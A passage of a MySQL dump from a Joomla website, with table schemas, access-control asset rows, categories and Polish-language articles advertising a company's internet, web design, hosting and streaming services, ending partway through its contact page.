-- MySQL dump 10.11 -- -- Host: localhost Database: newi24 -- ------------------------------------------------------ -- Server version 5.0.95 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `jos_assets` -- DROP TABLE IF EXISTS `jos_assets`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_assets` ( `id` int(10) unsigned NOT NULL auto_increment COMMENT 'Primary Key', `parent_id` int(11) NOT NULL default '0' COMMENT 'Nested set parent.', `lft` int(11) NOT NULL default '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL default '0' COMMENT 'Nested set rgt.', `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.', `name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n', `title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_asset_name` (`name`), KEY `idx_lft_rgt` (`lft`,`rgt`), KEY `idx_parent_id` (`parent_id`) ) ENGINE=InnoDB AUTO_INCREMENT=50 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_assets` -- LOCK TABLES `jos_assets` WRITE; /*!40000 ALTER TABLE `jos_assets` DISABLE KEYS */; INSERT INTO `jos_assets` VALUES (1,0,1,450,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,16,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,17,56,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,57,58,1,'com_cpanel','com_cpanel','{}'),(10,1,59,60,1,'com_installer','com_installer','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1},\"core.delete\":[],\"core.edit.state\":[]}'),(11,1,61,62,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,63,64,1,'com_login','com_login','{}'),(13,1,65,66,1,'com_mailto','com_mailto','{}'),(14,1,67,68,1,'com_massmail','com_massmail','{}'),(15,1,69,70,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,71,72,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,73,74,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,75,76,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,77,80,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,81,82,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,83,84,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,85,86,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,87,88,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,89,90,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.own\":{\"6\":1},\"core.edit.state\":[]}'),(25,1,91,94,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,95,96,1,'com_wrapper','com_wrapper','{}'),(27,8,18,31,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,78,79,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,92,93,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(32,8,32,41,2,'com_content.category.7','Strona Główna','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(33,32,33,34,3,'com_content.article.1','Internet','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(34,32,35,36,3,'com_content.article.2','strony www','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(35,32,37,38,3,'com_content.article.3','Hosting','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(36,32,39,40,3,'com_content.article.4','Streaming','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,27,19,20,3,'com_content.article.5','Hosting','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(38,27,21,22,3,'com_content.article.6','Kontakt','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(39,27,23,24,3,'com_content.article.7','Internet','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,27,25,26,3,'com_content.article.8','Nasza polityka Cookies','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,27,27,28,3,'com_content.article.9','Jak wyłączyć cookies?','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,8,42,53,2,'com_content.category.8','Kariera','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(43,42,43,44,3,'com_content.article.10','Frontend Developer','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,42,45,46,3,'com_content.article.11','Programista PHP','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(45,42,47,48,3,'com_content.article.12','Grafik WWW','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(46,42,49,50,3,'com_content.article.13','Specjalista od Marketingu Internetowego','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(47,42,51,52,3,'com_content.article.14','Project Menager','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(48,27,29,30,3,'com_content.article.15','Error 404','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(49,8,54,55,2,'com_content.category.9','Pomoc','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'); /*!40000 ALTER TABLE `jos_assets` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banner_clients` -- DROP TABLE IF EXISTS `jos_banner_clients`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banner_clients` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `contact` varchar(255) NOT NULL default '', `email` varchar(255) NOT NULL default '', `extrainfo` text NOT NULL, `state` tinyint(3) NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `metakey` text NOT NULL, `own_prefix` tinyint(4) NOT NULL default '0', `metakey_prefix` varchar(255) NOT NULL default '', `purchase_type` tinyint(4) NOT NULL default '-1', `track_clicks` tinyint(4) NOT NULL default '-1', `track_impressions` tinyint(4) NOT NULL default '-1', PRIMARY KEY (`id`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banner_clients` -- LOCK TABLES `jos_banner_clients` WRITE; /*!40000 ALTER TABLE `jos_banner_clients` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banner_clients` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banner_tracks` -- DROP TABLE IF EXISTS `jos_banner_tracks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banner_tracks` ( `track_date` datetime NOT NULL, `track_type` int(10) unsigned NOT NULL, `banner_id` int(10) unsigned NOT NULL, `count` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`track_date`,`track_type`,`banner_id`), KEY `idx_track_date` (`track_date`), KEY `idx_track_type` (`track_type`), KEY `idx_banner_id` (`banner_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banner_tracks` -- LOCK TABLES `jos_banner_tracks` WRITE; /*!40000 ALTER TABLE `jos_banner_tracks` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banner_tracks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banners` -- DROP TABLE IF EXISTS `jos_banners`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banners` ( `id` int(11) NOT NULL auto_increment, `cid` int(11) NOT NULL default '0', `type` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `imptotal` int(11) NOT NULL default '0', `impmade` int(11) NOT NULL default '0', `clicks` int(11) NOT NULL default '0', `clickurl` varchar(200) NOT NULL default '', `state` tinyint(3) NOT NULL default '0', `catid` int(10) unsigned NOT NULL default '0', `description` text NOT NULL, `custombannercode` varchar(2048) NOT NULL, `sticky` tinyint(1) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `metakey` text NOT NULL, `params` text NOT NULL, `own_prefix` tinyint(1) NOT NULL default '0', `metakey_prefix` varchar(255) NOT NULL default '', `purchase_type` tinyint(4) NOT NULL default '-1', `track_clicks` tinyint(4) NOT NULL default '-1', `track_impressions` tinyint(4) NOT NULL default '-1', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `reset` datetime NOT NULL default '0000-00-00 00:00:00', `created` datetime NOT NULL default '0000-00-00 00:00:00', `language` char(7) NOT NULL default '', PRIMARY KEY (`id`), KEY `idx_state` (`state`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`), KEY `idx_banner_catid` (`catid`), KEY `idx_language` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banners` -- LOCK TABLES `jos_banners` WRITE; /*!40000 ALTER TABLE `jos_banners` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banners` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_categories` -- DROP TABLE IF EXISTS `jos_categories`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_categories` ( `id` int(11) NOT NULL auto_increment, `asset_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to the #__assets table.', `parent_id` int(10) unsigned NOT NULL default '0', `lft` int(11) NOT NULL default '0', `rgt` int(11) NOT NULL default '0', `level` int(10) unsigned NOT NULL default '0', `path` varchar(255) NOT NULL default '', `extension` varchar(50) NOT NULL default '', `title` varchar(255) NOT NULL, `alias` varchar(255) NOT NULL default '', `note` varchar(255) NOT NULL default '', `description` varchar(5120) NOT NULL default '', `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `access` tinyint(3) unsigned NOT NULL default '0', `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL default '0', `created_time` datetime NOT NULL default '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL default '0', `modified_time` datetime NOT NULL default '0000-00-00 00:00:00', `hits` int(10) unsigned NOT NULL default '0', `language` char(7) NOT NULL, PRIMARY KEY (`id`), KEY `cat_idx` (`extension`,`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_categories` -- LOCK TABLES `jos_categories` WRITE; /*!40000 ALTER TABLE `jos_categories` DISABLE KEYS */; INSERT INTO `jos_categories` VALUES (1,0,0,0,17,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2009-10-18 16:07:09',0,'0000-00-00 00:00:00',0,'*'),(2,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:26:37',0,'0000-00-00 00:00:00',0,'*'),(3,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:35',0,'0000-00-00 00:00:00',0,'*'),(4,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:57',0,'0000-00-00 00:00:00',0,'*'),(5,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:15',0,'0000-00-00 00:00:00',0,'*'),(6,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*'),(7,32,1,11,12,1,'strona-glowna','com_content','Strona Główna','strona-glowna','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-07-14 07:05:05',0,'0000-00-00 00:00:00',0,'*'),(8,42,1,13,14,1,'kariera','com_content','Kariera','kariera','','

Jesteś przebojowy i szukasz pracy w ciekawym zespole i młodej atmosferze, czy jakoś tak? To dlaczego jeszcze z nami nie pracujesz?

\r\n

Zobacz czy aktualnie szukamy osoby z Twoimi umiejętnościami i prześlij nam jakieś in(CV)fo o sobie!

',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',45,'2013-04-23 11:50:17',0,'0000-00-00 00:00:00',0,'*'),(9,49,1,15,16,1,'pomoc','com_content','Pomoc','pomoc','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',45,'2014-02-25 15:00:15',0,'0000-00-00 00:00:00',0,'*'); /*!40000 ALTER TABLE `jos_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_contact_details` -- DROP TABLE IF EXISTS `jos_contact_details`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_contact_details` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `con_position` varchar(255) default NULL, `address` text, `suburb` varchar(100) default NULL, `state` varchar(100) default NULL, `country` varchar(100) default NULL, `postcode` varchar(100) default NULL, `telephone` varchar(255) default NULL, `fax` varchar(255) default NULL, `misc` mediumtext, `image` varchar(255) default NULL, `imagepos` varchar(20) default NULL, `email_to` varchar(255) default NULL, `default_con` tinyint(1) unsigned NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text NOT NULL, `user_id` int(11) NOT NULL default '0', `catid` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `mobile` varchar(255) NOT NULL default '', `webpage` varchar(255) NOT NULL default '', `sortname1` varchar(255) NOT NULL, `sortname2` varchar(255) NOT NULL, `sortname3` varchar(255) NOT NULL, `language` char(7) NOT NULL, `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Set if article is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_contact_details` -- LOCK TABLES `jos_contact_details` WRITE; /*!40000 ALTER TABLE `jos_contact_details` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_contact_details` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content` -- DROP TABLE IF EXISTS `jos_content`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content` ( `id` int(10) unsigned NOT NULL auto_increment, `asset_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to the #__assets table.', `title` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `title_alias` varchar(255) NOT NULL default '', `introtext` mediumtext NOT NULL, `fulltext` mediumtext NOT NULL, `state` tinyint(3) NOT NULL default '0', `sectionid` int(10) unsigned NOT NULL default '0', `mask` int(10) unsigned NOT NULL default '0', `catid` int(10) unsigned NOT NULL default '0', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `attribs` varchar(5120) NOT NULL, `version` int(10) unsigned NOT NULL default '1', `parentid` int(10) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(10) unsigned NOT NULL default '0', `hits` int(10) unsigned NOT NULL default '0', `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Set if article is featured.', `language` char(7) NOT NULL COMMENT 'The language code for the article.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content` -- LOCK TABLES `jos_content` WRITE; /*!40000 ALTER TABLE `jos_content` DISABLE KEYS */; INSERT INTO `jos_content` VALUES (1,33,'Internet','internet','','
\r\n

\"Internet\"

\r\n\r\n

Czytaj więcej

\r\n','\r\n

Jedną z naszych wiodących usług jest usługa dostępu do internetu. Świadczymy ją zarówno klientom indywidualnym jak i firmom.

\r\n

Posiadamy różne prędkości internetu w zależności od potrzeb klientów. Dla firm możliwe jest również zestawienie łącza z indywidualnym ustawieniem prędkości pobierania i wysyłania danych.

\r\n

Więcej informacji można znaleźć na naszej stronie i24.pl

',1,0,0,7,'2011-07-14 07:16:58',42,'','2012-03-22 08:33:59',45,0,'0000-00-00 00:00:00','2011-07-14 07:16:58','0000-00-00 00:00:00','','','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',19,0,3,'','',1,9,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(2,34,'strony www','strony-www','','
\r\n

\"strony

\r\n\r\n

Czytaj więcej

\r\n','\r\n

Tworzenie stron internetowych oraz aplikacji (mobilnych, internetowych czy też stacjonarnych) to nasza pasja. Zajmujemy się tym od wielu lat, a dzięki naszemu doświadczeniu powstało wiele ciekawych stron, oraz aplikacji.

\r\n

Zapraszamy do odwiedzenia naszej strony WytworniaStron.pl i skorzystania z naszej oferty.

',1,0,0,7,'2011-07-14 07:26:37',42,'','2012-03-22 12:15:00',45,0,'0000-00-00 00:00:00','2011-07-14 07:26:37','0000-00-00 00:00:00','','','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',22,0,2,'','',1,20,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(3,35,'Hosting','hosting','','
\r\n

\"hosting\"

\r\n\r\n

Czytaj więcej

\r\n','\r\n

Nasz hosting to nie zwykły serwer dedykowany, ale cała obsługa techniczna wyszkolonej kadry informatycznej. Przez 24 godziny 7 dni w tygodniu czuwają nad bezpieczeństwem i obsługą Państwa danych.

\r\n

Taka usługa nazywa się hosting dedykowany. Więcej na tema hostingu możecie Państwo znaleźć na naszej podstronie o hostingu.

',1,0,0,7,'2011-07-14 07:27:43',42,'','2014-01-20 12:08:00',43,0,'0000-00-00 00:00:00','2011-07-14 07:27:43','0000-00-00 00:00:00','','','{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',30,0,1,'','',1,23,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(4,36,'Streaming','streaming','','
\r\n

\"Streaming

\r\n\r\n

Czytaj więcej

\r\n','\r\n

Streaming to technika dostarczania informacji multimedialnej na życzenie. Najpopularniejsze media strumieniowe (streaming) opierają się na transmisji skompresowanych danych multimedialnych poprzez Internet. Czyli możemy przesyłać obraz i dźwięk przez internet. Więcej na temat oferty streamingu można znaleźć na naszej stronie live24.pro

',1,0,0,7,'2011-07-14 11:50:59',42,'','2012-03-22 12:08:08',45,0,'0000-00-00 00:00:00','2011-07-14 11:50:59','0000-00-00 00:00:00','','','{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',17,0,0,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(5,37,'Hosting','hosting','','','',1,0,0,2,'2011-10-13 09:56:34',42,'','2014-01-20 12:00:44',43,0,'0000-00-00 00:00:00','2011-10-13 09:56:34','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',5,0,5,'','',1,5138,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(6,38,'Kontakt','kontakt','','

Webvisor Sp. z o.o.

\r\n

Al. Wolności 19, 33-300 Nowy Sącz
NIP: 7342938664, REGON: 492835887, NrVAT: PL7342938664
Sąd Rejonowy w Krakowie Wydział XII Gospodarczy
Krajowego Rejestru Sądowego KRS 0000144640
